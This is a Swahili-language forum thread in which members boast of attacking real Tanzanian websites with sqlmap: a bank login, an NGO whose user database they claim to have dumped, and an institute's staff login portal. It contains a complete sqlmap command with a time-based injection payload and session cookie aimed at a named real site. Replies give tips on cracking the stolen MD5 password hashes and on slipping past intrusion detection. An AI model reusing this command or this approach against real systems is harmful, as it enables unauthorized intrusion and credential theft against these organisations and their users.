the great wizard
JF-Expert Member
- Dec 21, 2015
- 1,482
- 894
Inakuja hio hehehheworking on our vulnerable target
View attachment 1086559
sqlmap got a 303 redirect to 'https://mkombozibank.co.tz/login'. Do you want to follow? [Y/n] nInakuja hio hehehhe
Ukiiifuata haina shida hio payload niliofuma hapo inalabua hadi redirectsqlmap got a 303 redirect to 'https://mkombozibank.co.tz/login'. Do you want to follow? [Y/n] n
si hakuna umuhimu wa kufuata hizo redirects
sema hii ni blind attack inakuwa ngumu attacker anakuwa haijui db kiundaniInakuja hio hehehhe
fresh ngoja nione kama nitaweza ku dump chochoteUkiiifuata haina shida hio payload niliofuma hapo inalabua hadi redirect
Eeeeh hapo unapiga trial and error na hio mixed request mpka inaaachia loopholessema hii ni blind attack inakuwa ngumu attacker anakuwa haijui db kiundani
yeah ngoja niiache iendelee ntakuja na feedbackEeeeh hapo unapiga trial and error na hio mixed request mpka inaaachia loopholes
32 db found, site is volnurableEeeeh hapo unapiga trial and error na hio mixed request mpka inaaachia loopholes
Hehehhehehehe nilijua tu huo mkeka huwez tema... Unapandisha loopholes kilazima32 db found, site is volnurable
View attachment 1086638
sema bds zipo nyingi apo inabidi ucheki atleast moja baada ya nyingine ili uweze kupata yenye sensitive informationHehehhehehehe nilijua tu huo mkeka huwez tema... Unapandisha loopholes kilazima
Hapo me na shetani nimempandisha tyr sema sasa hao wajamaaa wan idz yan system yao ina record rogs wameupdate juzsema bds zipo nyingi apo inabidi ucheki atleast moja baada ya nyingine ili uweze kupata yenye sensitive information
nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hashHapo me na shetani nimempandisha tyr sema sasa hao wajamaaa wan idz yan system yao ina record rogs wameupdate juz
Tumia hio hashkiller.co.uk/nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash
Wako fsh on md5 https://hashkiller.co.uk/nimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash
Hao nao waoga yani nimesuka hio lakn server inakimbianimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash
Shit ziko nyingi sana ndo maana tunaipenda TANZANIA hatuamiiinimeweza kufumua dbs ya users kwenye NGO flani ivi ya bongo sema pwd zao zipo kwenye hash form zinaweza kuwa decrypted ila unfortunately parrot sec home edition haina ile tool ya ku decrypt hash
Wako fsh on md5 https://hashkiller.co.uk/
Sawa kiongozi ngoja kwanza niingie afternoon session then nikitoka nije nijaribu kufanya hizo vituHao nao waoga yani nimesuka hio lakn server inakimbia
sqlmap.py -u "http://ifmsis.ac.tz/staffis/account/login.php" --data="loginBtn=Login&checkbox=checkbox&pass=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&user=cbwimtag" -p pass --cookie="PHPSESSID=pdblvlaiv8b9sjn7hu5q7chs25" --referer="http://ifmsis.ac.tz" --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" --no-cast --technique=BEUS --random-agent --tamper=space2comment --risk=3 --level=3 --timeout=2 --ignore-proxy --flush-session -v 1 --dbs
Embu jaribu ku decrypt hizi hashWako fsh on md5 https://hashkiller.co.uk/
┌─[root@parrot]─[~]Hahaha! See you there at ur terminal..
gud job bro.